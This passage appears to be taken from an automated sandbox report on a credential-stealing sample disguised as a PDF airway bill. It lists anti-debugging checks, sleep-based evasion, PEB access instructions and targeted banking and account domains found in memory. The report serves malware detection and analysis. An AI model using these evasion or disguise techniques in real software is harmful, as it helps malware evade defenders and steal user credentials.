                      Source: C:\Windows\SysWOW64\proquota.exeAPI/Special instruction interceptor: Address: 7FFDB442D504
                      Source: C:\Windows\SysWOW64\proquota.exeAPI/Special instruction interceptor: Address: 7FFDB442D544
                      Source: C:\Windows\SysWOW64\proquota.exeAPI/Special instruction interceptor: Address: 7FFDB442D1E4
                      Source: C:\Windows\SysWOW64\proquota.exeAPI/Special instruction interceptor: Address: 7FFDB4430154
                      Source: C:\Windows\SysWOW64\proquota.exeAPI/Special instruction interceptor: Address: 7FFDB442DA44
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CF096E rdtsc 5_2_24CF096E
                      Source: C:\Windows\SysWOW64\proquota.exeWindow / User API: threadDelayed 9839Jump to behavior
                      Source: C:\Users\Public\Libraries\hdcleziT.pifAPI coverage: 0.8 %
                      Source: C:\Users\Public\Libraries\hdcleziT.pifAPI coverage: 0.3 %
                      Source: C:\Windows\SysWOW64\proquota.exe TID: 6492Thread sleep count: 135 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exe TID: 6492Thread sleep time: -270000s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exe TID: 6492Thread sleep count: 9839 > 30Jump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exe TID: 6492Thread sleep time: -19678000s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\WDmVPKMsYWkiMMtMFxMhEzeJnYuwTWZuIdiFgSkFCldxaFGwlFILXgUMWRDuvixzKBzhBZmNRBJI\WQzLddwiZR.exe TID: 2960Thread sleep time: -35000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\proquota.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\proquota.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeCode function: 0_2_02B258B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02B258B4
                      Source: 0j0OId92L.18.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                      Source: 0j0OId92L.18.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                      Source: 0j0OId92L.18.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                      Source: 0j0OId92L.18.drBinary or memory string: discord.comVMware20,11696487552f
                      Source: 0j0OId92L.18.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                      Source: 0j0OId92L.18.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                      Source: Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2170331076.000000000071B000.00000004.00000020.00020000.00000000.sdmp, Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exe, 00000000.00000002.2170331076.0000000000749000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: 0j0OId92L.18.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                      Source: 0j0OId92L.18.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                      Source: 0j0OId92L.18.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                      Source: 0j0OId92L.18.drBinary or memory string: global block list test formVMware20,11696487552
                      Source: 0j0OId92L.18.drBinary or memory string: tasks.office.comVMware20,11696487552o
                      Source: WQzLddwiZR.exe, 00000015.00000002.3369230064.00000000006DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlll
                      Source: 0j0OId92L.18.drBinary or memory string: AMC password management pageVMware20,11696487552
                      Source: Tizelcdh.PIF, 0000000C.00000002.2409057276.0000000000618000.00000004.00000020.00020000.00000000.sdmp, proquota.exe, 00000012.00000002.3369025968.00000000007B9000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.3089822122.000001DE5941C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: 0j0OId92L.18.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                      Source: 0j0OId92L.18.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                      Source: 0j0OId92L.18.drBinary or memory string: dev.azure.comVMware20,11696487552j
                      Source: 0j0OId92L.18.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                      Source: 0j0OId92L.18.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                      Source: Tizelcdh.PIF, 00000007.00000002.2321834627.000000000067E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll9
                      Source: 0j0OId92L.18.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                      Source: 0j0OId92L.18.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                      Source: 0j0OId92L.18.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                      Source: 0j0OId92L.18.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                      Source: 0j0OId92L.18.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                      Source: 0j0OId92L.18.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                      Source: 0j0OId92L.18.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                      Source: 0j0OId92L.18.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                      Source: 0j0OId92L.18.drBinary or memory string: outlook.office.comVMware20,11696487552s
                      Source: 0j0OId92L.18.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                      Source: 0j0OId92L.18.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                      Source: 0j0OId92L.18.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                      Source: 0j0OId92L.18.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                      Source: 0j0OId92L.18.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeAPI call chain: ExitProcess graph end nodegraph_0-25962
                      Source: C:\Users\Public\Libraries\hdcleziT.pifProcess information queried: ProcessInformationJump to behavior

                      Anti Debugging

                      barindex
                      Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeCode function: 0_2_02B3EBE8 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,0_2_02B3EBE8
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\Public\Libraries\hdcleziT.pifProcess queried: DebugPortJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess queried: DebugPortJump to behavior
                      Source: C:\Users\Public\Libraries\hdcleziT.pifProcess queried: DebugPortJump to behavior
                      Source: C:\Users\Public\Libraries\Tizelcdh.PIFProcess queried: DebugPortJump to behavior
                      Source: C:\Users\Public\Libraries\hdcleziT.pifProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\SysWOW64\proquota.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CF096E rdtsc 5_2_24CF096E
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_00417B33 LdrLoadDll,5_2_00417B33
                      Source: C:\Users\user\Desktop\Airway bill details - Delivery receipt Contact Form no_45987165927 ,pdf.scr.exeCode function: 0_2_02B38798 LoadLibraryW,GetProcAddress,FreeLibrary,0_2_02B38798
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB04E5 mov ecx, dword ptr fs:[00000030h]5_2_24CB04E5
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D6A49A mov eax, dword ptr fs:[00000030h]5_2_24D6A49A
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB64AB mov eax, dword ptr fs:[00000030h]5_2_24CB64AB
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D3A4B0 mov eax, dword ptr fs:[00000030h]5_2_24D3A4B0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CE44B0 mov ecx, dword ptr fs:[00000030h]5_2_24CE44B0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D6A456 mov eax, dword ptr fs:[00000030h]5_2_24D6A456
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CEE443 mov eax, dword ptr fs:[00000030h]5_2_24CEE443
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CEE443 mov eax, dword ptr fs:[00000030h]5_2_24CEE443
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CEE443 mov eax, dword ptr fs:[00000030h]5_2_24CEE443
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CEE443 mov eax, dword ptr fs:[00000030h]5_2_24CEE443
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CEE443 mov eax, dword ptr fs:[00000030h]5_2_24CEE443
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CEE443 mov eax, dword ptr fs:[00000030h]5_2_24CEE443
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CEE443 mov eax, dword ptr fs:[00000030h]5_2_24CEE443
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CEE443 mov eax, dword ptr fs:[00000030h]5_2_24CEE443
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CA645D mov eax, dword ptr fs:[00000030h]5_2_24CA645D
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CD245A mov eax, dword ptr fs:[00000030h]5_2_24CD245A
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D3C460 mov ecx, dword ptr fs:[00000030h]5_2_24D3C460
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CDA470 mov eax, dword ptr fs:[00000030h]5_2_24CDA470
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CDA470 mov eax, dword ptr fs:[00000030h]5_2_24CDA470
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CDA470 mov eax, dword ptr fs:[00000030h]5_2_24CDA470
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CE8402 mov eax, dword ptr fs:[00000030h]5_2_24CE8402
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CE8402 mov eax, dword ptr fs:[00000030h]5_2_24CE8402
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CE8402 mov eax, dword ptr fs:[00000030h]5_2_24CE8402
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CAE420 mov eax, dword ptr fs:[00000030h]5_2_24CAE420
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CAE420 mov eax, dword ptr fs:[00000030h]5_2_24CAE420
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CAE420 mov eax, dword ptr fs:[00000030h]5_2_24CAE420
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CAC427 mov eax, dword ptr fs:[00000030h]5_2_24CAC427
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D36420 mov eax, dword ptr fs:[00000030h]5_2_24D36420
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D36420 mov eax, dword ptr fs:[00000030h]5_2_24D36420
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D36420 mov eax, dword ptr fs:[00000030h]5_2_24D36420
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D36420 mov eax, dword ptr fs:[00000030h]5_2_24D36420
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D36420 mov eax, dword ptr fs:[00000030h]5_2_24D36420
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D36420 mov eax, dword ptr fs:[00000030h]5_2_24D36420
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D36420 mov eax, dword ptr fs:[00000030h]5_2_24D36420
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CEA430 mov eax, dword ptr fs:[00000030h]5_2_24CEA430
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CEE5CF mov eax, dword ptr fs:[00000030h]5_2_24CEE5CF
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CEE5CF mov eax, dword ptr fs:[00000030h]5_2_24CEE5CF
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB65D0 mov eax, dword ptr fs:[00000030h]5_2_24CB65D0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CEA5D0 mov eax, dword ptr fs:[00000030h]5_2_24CEA5D0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CEA5D0 mov eax, dword ptr fs:[00000030h]5_2_24CEA5D0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CEC5ED mov eax, dword ptr fs:[00000030h]5_2_24CEC5ED
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CEC5ED mov eax, dword ptr fs:[00000030h]5_2_24CEC5ED
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CDE5E7 mov eax, dword ptr fs:[00000030h]5_2_24CDE5E7
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CDE5E7 mov eax, dword ptr fs:[00000030h]5_2_24CDE5E7
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CDE5E7 mov eax, dword ptr fs:[00000030h]5_2_24CDE5E7
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CDE5E7 mov eax, dword ptr fs:[00000030h]5_2_24CDE5E7
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CDE5E7 mov eax, dword ptr fs:[00000030h]5_2_24CDE5E7
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CDE5E7 mov eax, dword ptr fs:[00000030h]5_2_24CDE5E7
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CDE5E7 mov eax, dword ptr fs:[00000030h]5_2_24CDE5E7
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CDE5E7 mov eax, dword ptr fs:[00000030h]5_2_24CDE5E7
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB25E0 mov eax, dword ptr fs:[00000030h]5_2_24CB25E0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CE4588 mov eax, dword ptr fs:[00000030h]5_2_24CE4588
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB2582 mov eax, dword ptr fs:[00000030h]5_2_24CB2582
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB2582 mov ecx, dword ptr fs:[00000030h]5_2_24CB2582
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CEE59C mov eax, dword ptr fs:[00000030h]5_2_24CEE59C
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D305A7 mov eax, dword ptr fs:[00000030h]5_2_24D305A7
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D305A7 mov eax, dword ptr fs:[00000030h]5_2_24D305A7
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D305A7 mov eax, dword ptr fs:[00000030h]5_2_24D305A7
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CD45B1 mov eax, dword ptr fs:[00000030h]5_2_24CD45B1
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CD45B1 mov eax, dword ptr fs:[00000030h]5_2_24CD45B1
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB8550 mov eax, dword ptr fs:[00000030h]5_2_24CB8550
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB8550 mov eax, dword ptr fs:[00000030h]5_2_24CB8550
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CE656A mov eax, dword ptr fs:[00000030h]5_2_24CE656A
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CE656A mov eax, dword ptr fs:[00000030h]5_2_24CE656A
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CE656A mov eax, dword ptr fs:[00000030h]5_2_24CE656A
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D46500 mov eax, dword ptr fs:[00000030h]5_2_24D46500
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D84500 mov eax, dword ptr fs:[00000030h]5_2_24D84500
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D84500 mov eax, dword ptr fs:[00000030h]5_2_24D84500
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D84500 mov eax, dword ptr fs:[00000030h]5_2_24D84500
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D84500 mov eax, dword ptr fs:[00000030h]5_2_24D84500
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D84500 mov eax, dword ptr fs:[00000030h]5_2_24D84500
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D84500 mov eax, dword ptr fs:[00000030h]5_2_24D84500
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D84500 mov eax, dword ptr fs:[00000030h]5_2_24D84500
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CDE53E mov eax, dword ptr fs:[00000030h]5_2_24CDE53E
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CDE53E mov eax, dword ptr fs:[00000030h]5_2_24CDE53E
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CDE53E mov eax, dword ptr fs:[00000030h]5_2_24CDE53E
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CDE53E mov eax, dword ptr fs:[00000030h]5_2_24CDE53E
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CDE53E mov eax, dword ptr fs:[00000030h]5_2_24CDE53E
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC0535 mov eax, dword ptr fs:[00000030h]5_2_24CC0535
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC0535 mov eax, dword ptr fs:[00000030h]5_2_24CC0535
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC0535 mov eax, dword ptr fs:[00000030h]5_2_24CC0535
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC0535 mov eax, dword ptr fs:[00000030h]5_2_24CC0535
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC0535 mov eax, dword ptr fs:[00000030h]5_2_24CC0535
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC0535 mov eax, dword ptr fs:[00000030h]5_2_24CC0535
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CEA6C7 mov ebx, dword ptr fs:[00000030h]5_2_24CEA6C7
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CEA6C7 mov eax, dword ptr fs:[00000030h]5_2_24CEA6C7
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D2E6F2 mov eax, dword ptr fs:[00000030h]5_2_24D2E6F2
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D2E6F2 mov eax, dword ptr fs:[00000030h]5_2_24D2E6F2
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D2E6F2 mov eax, dword ptr fs:[00000030h]5_2_24D2E6F2
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D2E6F2 mov eax, dword ptr fs:[00000030h]5_2_24D2E6F2
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D306F1 mov eax, dword ptr fs:[00000030h]5_2_24D306F1
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D306F1 mov eax, dword ptr fs:[00000030h]5_2_24D306F1
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB4690 mov eax, dword ptr fs:[00000030h]5_2_24CB4690
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB4690 mov eax, dword ptr fs:[00000030h]5_2_24CB4690
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CEC6A6 mov eax, dword ptr fs:[00000030h]5_2_24CEC6A6
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CE66B0 mov eax, dword ptr fs:[00000030h]5_2_24CE66B0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CCC640 mov eax, dword ptr fs:[00000030h]5_2_24CCC640
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CEA660 mov eax, dword ptr fs:[00000030h]5_2_24CEA660
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CEA660 mov eax, dword ptr fs:[00000030h]5_2_24CEA660
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D7866E mov eax, dword ptr fs:[00000030h]5_2_24D7866E
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D7866E mov eax, dword ptr fs:[00000030h]5_2_24D7866E
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CE2674 mov eax, dword ptr fs:[00000030h]5_2_24CE2674
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC260B mov eax, dword ptr fs:[00000030h]5_2_24CC260B
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC260B mov eax, dword ptr fs:[00000030h]5_2_24CC260B
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC260B mov eax, dword ptr fs:[00000030h]5_2_24CC260B
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC260B mov eax, dword ptr fs:[00000030h]5_2_24CC260B
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC260B mov eax, dword ptr fs:[00000030h]5_2_24CC260B
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC260B mov eax, dword ptr fs:[00000030h]5_2_24CC260B
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC260B mov eax, dword ptr fs:[00000030h]5_2_24CC260B
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CF2619 mov eax, dword ptr fs:[00000030h]5_2_24CF2619
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D2E609 mov eax, dword ptr fs:[00000030h]5_2_24D2E609
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB262C mov eax, dword ptr fs:[00000030h]5_2_24CB262C
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CCE627 mov eax, dword ptr fs:[00000030h]5_2_24CCE627
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CE6620 mov eax, dword ptr fs:[00000030h]5_2_24CE6620
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CE8620 mov eax, dword ptr fs:[00000030h]5_2_24CE8620
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CBC7C0 mov eax, dword ptr fs:[00000030h]5_2_24CBC7C0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D307C3 mov eax, dword ptr fs:[00000030h]5_2_24D307C3
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CD27ED mov eax, dword ptr fs:[00000030h]5_2_24CD27ED
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CD27ED mov eax, dword ptr fs:[00000030h]5_2_24CD27ED
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CD27ED mov eax, dword ptr fs:[00000030h]5_2_24CD27ED
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB47FB mov eax, dword ptr fs:[00000030h]5_2_24CB47FB
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB47FB mov eax, dword ptr fs:[00000030h]5_2_24CB47FB
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D3E7E1 mov eax, dword ptr fs:[00000030h]5_2_24D3E7E1
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D5678E mov eax, dword ptr fs:[00000030h]5_2_24D5678E
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB07AF mov eax, dword ptr fs:[00000030h]5_2_24CB07AF
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D647A0 mov eax, dword ptr fs:[00000030h]5_2_24D647A0
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CE674D mov esi, dword ptr fs:[00000030h]5_2_24CE674D
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CE674D mov eax, dword ptr fs:[00000030h]5_2_24CE674D
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CE674D mov eax, dword ptr fs:[00000030h]5_2_24CE674D
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D34755 mov eax, dword ptr fs:[00000030h]5_2_24D34755
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D3E75D mov eax, dword ptr fs:[00000030h]5_2_24D3E75D
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB0750 mov eax, dword ptr fs:[00000030h]5_2_24CB0750
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CF2750 mov eax, dword ptr fs:[00000030h]5_2_24CF2750
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CF2750 mov eax, dword ptr fs:[00000030h]5_2_24CF2750
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB8770 mov eax, dword ptr fs:[00000030h]5_2_24CB8770
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC0770 mov eax, dword ptr fs:[00000030h]5_2_24CC0770
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC0770 mov eax, dword ptr fs:[00000030h]5_2_24CC0770
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC0770 mov eax, dword ptr fs:[00000030h]5_2_24CC0770
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC0770 mov eax, dword ptr fs:[00000030h]5_2_24CC0770
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC0770 mov eax, dword ptr fs:[00000030h]5_2_24CC0770
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC0770 mov eax, dword ptr fs:[00000030h]5_2_24CC0770
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC0770 mov eax, dword ptr fs:[00000030h]5_2_24CC0770
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC0770 mov eax, dword ptr fs:[00000030h]5_2_24CC0770
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC0770 mov eax, dword ptr fs:[00000030h]5_2_24CC0770
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC0770 mov eax, dword ptr fs:[00000030h]5_2_24CC0770
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC0770 mov eax, dword ptr fs:[00000030h]5_2_24CC0770
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CC0770 mov eax, dword ptr fs:[00000030h]5_2_24CC0770
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CEC700 mov eax, dword ptr fs:[00000030h]5_2_24CEC700
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CB0710 mov eax, dword ptr fs:[00000030h]5_2_24CB0710
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24CE0710 mov eax, dword ptr fs:[00000030h]5_2_24CE0710
                      Source: C:\Users\Public\Libraries\hdcleziT.pifCode function: 5_2_24D2C730 mov eax, dword ptr fs:[00000030h]5_2_24D2C730
